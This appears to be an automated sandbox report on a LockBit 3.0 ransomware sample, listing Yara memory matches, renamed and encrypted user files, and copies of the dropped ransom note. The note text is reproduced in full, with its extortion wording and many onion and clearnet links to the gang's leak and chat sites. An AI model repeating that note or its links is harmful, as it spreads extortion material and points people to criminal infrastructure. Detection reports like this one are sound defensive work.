            Source: Yara matchFile source: 00000000.00000003.293997975.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.294487135.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.338263030.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.346958591.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350111910.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.268784054.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.346029516.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.283585341.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.341313974.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.291244110.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.356415227.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.268594041.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.291024022.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.280740158.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.294963306.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350997571.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.344832880.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.295145848.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.272680797.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.290242001.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.278740085.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.517676076.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.294366302.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.344311203.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 5216, type: MEMORYSTR
            Found ransom note / readme
            Source: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtDropped file: ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~>>>> Your data are stolen and encryptedThe data will be published on TOR website if you do not pay the ransom Links for Tor Browser:http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onionhttp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onionhttp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onionhttp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onionhttp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onionhttp://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onionhttp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onionhttp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onionhttp://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onionLinks for the normal browserhttp://lockbitapt.uzhttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.lyhttp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.lyhttp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.lyhttp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.lyhttp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.lyhttp://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.lyhttp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.lyhttp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.lyhttp://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly>>>> What guarantees that we will not deceive you? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. Life is too short to be sad. Be not sad, money, it is only paper. If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. You can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> You need contact us and decrypt one file for free on these TOR sites with your personal DECRYPTION IDDownload and install TOR Browser https://www.torproject.org/Write to a chat and wait for the answer, we will always answer you. Sometimes you will need to wait for our answer because we attack many companies.Links for Tor Browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onionLink for the normal browserhttp://lockbitsupp.uzIf you do not get an answer in the chat room for a long time, the site does nJump to dropped file
            Modifies existing user documents (likely ransomware behavior)
            Source: C:\Users\user\Desktop\file.exeFile moved: C:\Users\user\Desktop\HMPPSXQPQV.docxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile moved: C:\Users\user\Desktop\VWDFPKGDUF\HQJBRDYKDE.pdfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile moved: C:\Users\user\Desktop\VWDFPKGDUF\VWDFPKGDUF.docxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile moved: C:\Users\user\Desktop\QFAPOWPAFG.pngJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile moved: C:\Users\user\Desktop\VWDFPKGDUF.docxJump to behavior
            Writes many files with high entropy
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\index.g0sOhfQ0Z entropy: 7.99939440389Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_1.g0sOhfQ0Z entropy: 7.99930552125Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.g0sOhfQ0Z entropy: 7.99932883521Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.g0sOhfQ0Z entropy: 7.99913927409Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.g0sOhfQ0Z entropy: 7.99483740045Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.g0sOhfQ0Z entropy: 7.99716623453Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.g0sOhfQ0Z entropy: 7.99688858078Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl.g0sOhfQ0Z entropy: 7.9973593921Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051594443457600.txt.g0sOhfQ0Z entropy: 7.99864491355Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133114237730981539.txt.g0sOhfQ0Z entropy: 7.99856754903Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133114237750867104.txt.g0sOhfQ0Z entropy: 7.99820660861Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133114238038131791.txt.g0sOhfQ0Z entropy: 7.99827670791Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.g0sOhfQ0Z entropy: 7.99958737423Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z entropy: 7.99813365391Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\Settings.ft.g0sOhfQ0Z entropy: 7.99869335792Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\notificationsDB.g0sOhfQ0Z entropy: 7.99257377524Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages.g0sOhfQ0Z entropy: 7.99689096678Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z entropy: 7.9974529029Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs.g0sOhfQ0Z entropy: 7.99960886412Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs.g0sOhfQ0Z entropy: 7.99963976064Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log.g0sOhfQ0Z entropy: 7.99960024958Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log.g0sOhfQ0Z entropy: 7.99963764241Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb00001.log.g0sOhfQ0Z entropy: 7.99968069668Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z entropy: 7.99852659574Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\Settings.ft.g0sOhfQ0Z entropy: 7.99886537206Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsconversions.txt.g0sOhfQ0Z entropy: 7.99467099235Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appssynonyms.txt.g0sOhfQ0Z entropy: 7.99779777546Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.g0sOhfQ0Z entropy: 7.99878241179Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.g0sOhfQ0Z entropy: 7.99842732908Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.g0sOhfQ0Z entropy: 7.996844463Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsglobals.txt.g0sOhfQ0Z entropy: 7.99955202003Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsconversions.txt.g0sOhfQ0Z entropy: 7.99473788561Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsglobals.txt.g0sOhfQ0Z entropy: 7.99584930238Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingssynonyms.txt.g0sOhfQ0Z entropy: 7.99789963338Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z entropy: 7.99148519098Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\Apps.ft.g0sOhfQ0Z entropy: 7.99262997099Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\Apps.index.g0sOhfQ0Z entropy: 7.99861443306Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\Apps.ft.g0sOhfQ0Z entropy: 7.99292087268Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z entropy: 7.99138960345Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\Apps.index.g0sOhfQ0Z entropy: 7.99896579553Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z entropy: 7.99252298285Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\Apps.ft.g0sOhfQ0Z entropy: 7.99280032597Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75784512-3587-4faf-a718-7e0905e2788b}\Apps.index.g0sOhfQ0Z entropy: 7.99879160006Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z entropy: 7.99221152426Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\Apps.ft.g0sOhfQ0Z entropy: 7.99255232909Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{07e23474-3faa-40a5-947f-6a5b7376b175}\Apps.index.g0sOhfQ0Z entropy: 7.99868542376Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.g0sOhfQ0Z entropy: 7.99750907242Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.g0sOhfQ0Z entropy: 7.9970597947Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.g0sOhfQ0Z entropy: 7.99391529173Jump to dropped file
            Writes a notice file (html or txt) to demand a ransom
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\g0sOhfQ0Z.README.txt -> decryption and we will delete your data. life is too short to be sad. be not sad, money, it is only paper. if we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. therefore to us our reputation is very important. we attack the companies worldwide and there is no dissatisfied victim after payment. you can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> you need contact us and decrypt one file for free on these tor sites with your personal decryption iddownload and install tor browser https://www.torproject.org/write to a chat and wait for the answer, we will always answer you. sometimes you will need to wait for our answer because we attack many companies.links for tor browser:http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44Jump to dropped file

            System Summary

            barindex
